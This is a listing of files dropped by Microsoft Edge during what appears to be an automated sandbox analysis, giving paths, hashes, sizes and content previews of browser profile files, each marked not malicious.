SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.210570146158689
Encrypted:	false
SSDEEP:	6:BEtgv4q2P923oH+TcwtzjqEKj3K/2jMGIFUt8UEIHXNJZmw+UEsDkwO923oH+Tcd:B8v4YebvqBQFUt8UR/+UH5LYebvqBvJ
MD5:	00C2D628D7A7F101435EE141E7A8FC73
SHA1:	1359405D6D99EC899C3D3302E49766B37B838D9E
SHA-256:	E5418A8BCC753FD39F5841226BF71CDB2D50BEEF3C9F8623D031C92266A93595
SHA-512:	5BD655571ADDCD6FEC53F5BF395A1FD87D9B7B5A1C11454EB2BDC5C79FF5CF0F148C76B3010F6C524FA8BE9A05F80E954B58873181E2AEEC6EFDFA2F9CB190FE
Malicious:	false
Preview:	2024/12/27-01:10:31.839 1b80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:10:31.840 1b80 Recovering log #3.2024/12/27-01:10:31.844 1b80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.210570146158689
Encrypted:	false
SSDEEP:	6:BEtgv4q2P923oH+TcwtzjqEKj3K/2jMGIFUt8UEIHXNJZmw+UEsDkwO923oH+Tcd:B8v4YebvqBQFUt8UR/+UH5LYebvqBvJ
MD5:	00C2D628D7A7F101435EE141E7A8FC73
SHA1:	1359405D6D99EC899C3D3302E49766B37B838D9E
SHA-256:	E5418A8BCC753FD39F5841226BF71CDB2D50BEEF3C9F8623D031C92266A93595
SHA-512:	5BD655571ADDCD6FEC53F5BF395A1FD87D9B7B5A1C11454EB2BDC5C79FF5CF0F148C76B3010F6C524FA8BE9A05F80E954B58873181E2AEEC6EFDFA2F9CB190FE
Malicious:	false
Preview:	2024/12/27-01:10:31.839 1b80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:10:31.840 1b80 Recovering log #3.2024/12/27-01:10:31.844 1b80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2ac36577-5508-4f33-8f5b-85f56b4f76ab.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\384bbc0b-c980-472d-9e7f-d21bdb70b86e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\49763691-ff3b-4c49-8f11-d6c80b6ee10e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4b85f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	419
Entropy (8bit):	5.208634660958663
Encrypted:	false
SSDEEP:	12:BLM+v4YebvqBZFUt8UF/+UfMV5LYebvqBaJ:j4Yebvyg8/LYebvL
MD5:	8B6CB80E59B56EE75B9D05C85A0E3427
SHA1:	7C4980DBD3109EE3D16400927199B08EB3E2A2A2
SHA-256:	F402EEEF0DACF726AA08E4A51BC613F97353E924A8A594690E8D1FB20E6AC880
SHA-512:	8C289CE02EEA6ED497A0D7A1313F56599C146F551AE8C0DB414C7FA47C0FFEB9D2D03BC7C4536A878CAD6FB8E3DFBF7136940A024C9A16A84E3A8C582087B5F2
Malicious:	false
Preview:	2024/12/27-01:10:50.362 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-01:10:50.363 a6c Recovering log #3.2024/12/27-01:10:50.366 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	419
Entropy (8bit):	5.208634660958663
Encrypted:	false
SSDEEP:	12:BLM+v4YebvqBZFUt8UF/+UfMV5LYebvqBaJ:j4Yebvyg8/LYebvL
MD5:	8B6CB80E59B56EE75B9D05C85A0E3427
SHA1:	7C4980DBD3109EE3D16400927199B08EB3E2A2A2
SHA-256:	F402EEEF0DACF726AA08E4A51BC613F97353E924A8A594690E8D1FB20E6AC880
SHA-512:	8C289CE02EEA6ED497A0D7A1313F56599C146F551AE8C0DB414C7FA47C0FFEB9D2D03BC7C4536A878CAD6FB8E3DFBF7136940A024C9A16A84E3A8C582087B5F2
Malicious:	false
Preview:	2024/12/27-01:10:50.362 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-01:10:50.363 a6c Recovering log #3.2024/12/27-01:10:50.366 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.158407081557756
Encrypted:	false
SSDEEP:	6:BEspQL+q2P923oH+TcwtpIFUt8UElEiG1Zmw+UEliQLVkwO923oH+Tcwta/WLJ:Bbi+v4YebmFUt8Ud1/+UEnV5LYebaUJ
MD5:	914D389F4313B5CD9AFF2D1123AA8E0C
SHA1:	4A830EF4ACACD7A47F34674B2345AC4342F26911
SHA-256:	6917F82A7E2EB2E54A5D647F0D651E3D800EE980E7A2DA79DD7B6AFF402F7CF1
SHA-512:	91BFC9095FB7FAB3D2AC930B94E7FC4EAF93A381D2884FB95B7FD520E5FC15DB115C090CFBFBED32786BD9D355CEB9ED9BC6DB31D95F80ACE6C988C1608DFF07
Malicious:	false
Preview:	2024/12/27-01:10:31.124 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:10:31.125 a9c Recovering log #3.2024/12/27-01:10:31.126 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.158407081557756
Encrypted:	false
SSDEEP:	6:BEspQL+q2P923oH+TcwtpIFUt8UElEiG1Zmw+UEliQLVkwO923oH+Tcwta/WLJ:Bbi+v4YebmFUt8Ud1/+UEnV5LYebaUJ
MD5:	914D389F4313B5CD9AFF2D1123AA8E0C
SHA1:	4A830EF4ACACD7A47F34674B2345AC4342F26911
SHA-256:	6917F82A7E2EB2E54A5D647F0D651E3D800EE980E7A2DA79DD7B6AFF402F7CF1
SHA-512:	91BFC9095FB7FAB3D2AC930B94E7FC4EAF93A381D2884FB95B7FD520E5FC15DB115C090CFBFBED32786BD9D355CEB9ED9BC6DB31D95F80ACE6C988C1608DFF07
Malicious:	false
Preview:	2024/12/27-01:10:31.124 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:10:31.125 a9c Recovering log #3.2024/12/27-01:10:31.126 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2651165425571291
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum8:Bq+n0JX9ELyKOMq+8y9/Owr
MD5:	4370C9663247B28EEE042C7BD533C4E3
SHA1:	A4A3CF12CABD6F56AB2C1BC79200D449EA4DA4F4
SHA-256:	31B08EA8C5FC5A14E8CD99BEFE26557F83F1BD4AC822D871D572386EAEDA70BE
SHA-512:	6960F6A9C1EC2FC215D35432399D65D1AE85AACB2D02CD3D9C03DF1622027A842A43BE9B0FE3718DDA485AD17A9DEC72ACDA5301DF990C70A0E9AB56DC3400B4
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4654610098425324
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBSgLK8eReF:v7doKsKuKZKlZNmu46yjxIgL3Kg
MD5:	CAF9870CF86A2DB89284C817DAE55F4E
SHA1:	535AEB266AA0127F87F30BECF236B26894452D04
SHA-256:	40CBCEDE4728CD0E9E7CA5E6260505989675D69C471FCCD743F1B062342C7593
SHA-512:	32E2986957172E499D0F754E27D6E34418B56140BB4D9B4A8AB456F04653F9B02F99AB50517A1BB9DEBFF77F347DCAA2C9F3E2474F784832EABFF00F78618D5C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	0.13496676303918823
Encrypted:	false
SSDEEP:	3:+vHNllv/etXlf5wwj/1qvTv4RRfs21d7jdtQfQfww40Vw/lsXtXlf5ww+:HlWwjtpRS+dndOw40Vw/ClWw+
MD5:	F86AC032E8F3381F8FEE1A692E452387
SHA1:	2117DC599AC43173DB093C23CD24D1C16F881964
SHA-256:	27EDC086A340B3069D5A825A2D354B310F0F3BAB6F6FDB158BB52907F3A101A6
SHA-512:	8132D26DF8703B3BCEDF5AEED174393B432AEBB6B9EA390EFD2C0B102B864C3985833ADC783C0EE10D5D1F90C6F64ECEB51F6D6243B0968E685BCFAA108D8508
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ab76fc33-e9e3-4a0c-bc12-c7beee5a4ff8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9814
Entropy (8bit):	5.114689039739387
Encrypted:	false
SSDEEP:	192:stKkdpesD9SsZihUkRu/8GbV+FcPQA66WHaFIMYNPCYJ:stKQesD9SfhgbGOQx6WHaTYZ
MD5:	E0D9EAB77B6AF243DEC384221D470451
SHA1:	4EA2259663F12D388BCD9E8E4F0221C7553CF4EC
SHA-256:	43F0958ED5200B9B00A2E20AE709D323CD5F75550883B22F71572A757D06B2FC
SHA-512:	DB4897569707C2437CB32824CE3A3303D4430646AF0063BD934AF552BE207F8CF691CBE7085EE72A81178D79277A19F67ABD18105A68A567A53F41F129E377C2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379753431743412","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\daf911b6-ddf4-4946-a012-e209a0910b5a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e4942e92-5561-434d-8177-a439eff020ea.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.567564277775104
Encrypted:	false
SSDEEP:	768:2qjDYjDhejDkWPimDHfB8DB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvqjyDCjDhrwP:2CkNywWPHLfKdu1jaCj2+Setn
MD5:	E5DC346E79818144CB06BC9ACFE4A46F
SHA1:	D9FBDD1AC2B3F5D2964986F68BDB3DDDCA47C684
SHA-256:	81307BA005C2AB9C2F0A40D14C51F25233E44B24ED1D5E686A440D8F0AEDCDCF
SHA-512:	16C90FB2D9E3E96685C58C9E1E1E9EA0FF076F6117A106D964606B41F4750FDB302C5300EFDFBED7C8ABA3A616E8A02C871501EEA80CD7A7B96117ADEF179434
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379753431098420","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379753431098420","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f34587d1-f8b2-4bc7-8086-fec04d04a4ff.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
